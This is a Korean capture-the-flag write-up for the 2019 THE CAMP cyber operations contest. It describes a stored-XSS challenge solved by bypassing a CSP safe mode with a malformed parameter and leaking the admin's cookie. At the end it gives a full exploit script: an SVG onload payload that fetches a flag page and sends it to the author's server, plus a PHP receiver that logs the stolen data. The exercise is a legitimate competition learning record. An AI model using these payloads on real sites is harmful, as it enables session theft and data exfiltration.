2019 사이버작전 경연대회 THE CAMP

대회 시간안에 못풀고 대회 종료 후 힌트를 듣고 풀었다. 대회시간 내내 잡고있었는데 못풀어서 너무 아쉬웠다.

문제는 들어가보면 간단한 글쓰기 기능이 있고 해당 게시글을 view하는 페이지가 있다. 글쓸때 XSS 박아넣고 view URL을 admin한테 보내주면 된다.

view 페이지는 safe mode랑 unsafe mode 두가지가 존재하는데 safe mode에는 csp로 script-src 'self'가 걸려있다. 

그리고 admin한테 view url을 넘길때는 safe mode로만 전송이 가능하다.

첨엔 csp 우회해보려했는데 업로드 기능,서버 내 jsonp, jsonp처럼 쓸 수 있는 형태의 페이지, angularjs 등 시도할만한게 딱히 안보였다.

그러다 생각을 바꿔서 그냥 admin한테 url을 보내는 기능을 bypass해서 unsafe mode의 url을 보내는 식으로 시도해봤고 safe_mode 파라미터를 safe%7fmode 이런식으로 전송하니 bypass가되서 unsafe mode로 admin한테 url을 보내 xss를 실행시킬 수 있었다.

여기까지 풀었을때가 11시 좀 넘었고 쿠키 값 leak 하고나서 그냥 끝났다고 생각했다.

근데 주석에 있는 secret.php에 leak한 쿠키 값 세팅하고 들어갔보니 admin이 아니라했다.

여기서부터 멘붕의 시작이었다. leak한 값이 cred=y0u_4r3_g0000000d_47_byb_!!; PHPSESSID=lpbtodlctim7lnul88ig9bd9n0 이런 값이었는데 cred는 고정되어있었고 PHPSESSID는 봇이 xss가 박힌 view 페이지에 접근할 때 마다 바뀌는 상태였다.

admin php session이 고정이 안되어있길래 cred가 인증수단인가 싶어서 저걸로 별에별짓을 다했는데 도저히 뭐가 안나왔다. 

그렇게 세션따고 7시간을 별의별 삽질을 다하다 대회가 종료되었다.

그리고 대회종료 후에 팀동생이 문제푼 팀에서 swap 파일이 있었다고 알려줘서 설마하고 .secret.php.swp에 들어가보니까 swap 파일이 있었다....

swap 복구해서 소스보면 flag 페이지 있는데 그냥 leak한 cred=y0u_4r3_g0000000d_47_byb_!!; 쿠키에 박아넣고 secret.php가 아닌 admin.phar/flag.php 요청하니까 바로 플래그가 나왔다..

뭔가 secret.php 페이지 접근할때 단순 leak한 세션값이 아니고 뭔가 추가적인 인증수단이 있어서 안되는거라고 확신하고 문제를 풀다보니 한번쯤 시도해봤을번한 부분을 놓친것 같고 많이 아쉬웠다.

---추가---

대회때도 bypass되는 로직이 뭔가 이상하다고 느꼈었는데 확실하진 않지만 내가 문제를 푼 방식은 출제자가 의도하지 않은 방법인거 같다. 대회때는 빠르게 풀려다보니 그냥 대충 우회되는거 나와서 넘어갔었는데 생각해보니 그냥 iframe이나 object로 unsafe page load하는 구문을 safe mode page에 넣으면 csp 우회되는 문제였다. 

exploit.py

import requests
import time
import random
import os

my_webroot_dir = "/var/www/html/"   
my_server = "http://my_ip/"        

def write(user_session):
    url = "http://52.78.85.107/write_back.php"
    headers = {'Cookie': 'PHPSESSID='+user_session}
    payload = """
    </textarea>"""+str(random.randrange(100000,10000000))+"""<svg/onload="var xhr=new XMLHttpRequest();xhr.open('get','/admin.phar/flag.php',false);xhr.send();location.href='"""+my_server+"""/file.php?0='+btoa(xhr.responseText)";/>
    """
    params = {'regiment': '1','company':'1','name':'Hiadmin','body':payload}
    response = requests.post(url, data=params, headers=headers)
    result = response.text
    start = result.find("lid=")
    end = result.find("#")
    return result[start+4:end]

def send(payload,user_session):
    url = "http://52.78.85.107/submit.php"
    headers = {'Cookie': 'PHPSESSID='+user_session}
    abcd = "http://52.78.85.107/view.php?safe\x7fview=1&lid="+payload
    params = {'lid': payload, 'url': abcd}
    response = requests.post(url, data=params, headers=headers)
    result = response.text

def get_user_session():
    url = "http://52.78.85.107/index.php"
    response = requests.get(url)
    result = response.headers['Set-Cookie'].replace("PHPSESSID=","").replace("; path=/","")
    return result

user_session = get_user_session()
result = write(user_session)
time.sleep(1)
send(result,user_session)
time.sleep(5)
for i in range(0,10):
    try:
        f = open(my_webroot_dir+"/log.txt","r")
        print f.read()
        f.close()
        break
    except:
        continue

file.php

<?php
file_put_contents("./log.txt",base64_decode($_GET[0])."</br>",FILE_APPEND);
?>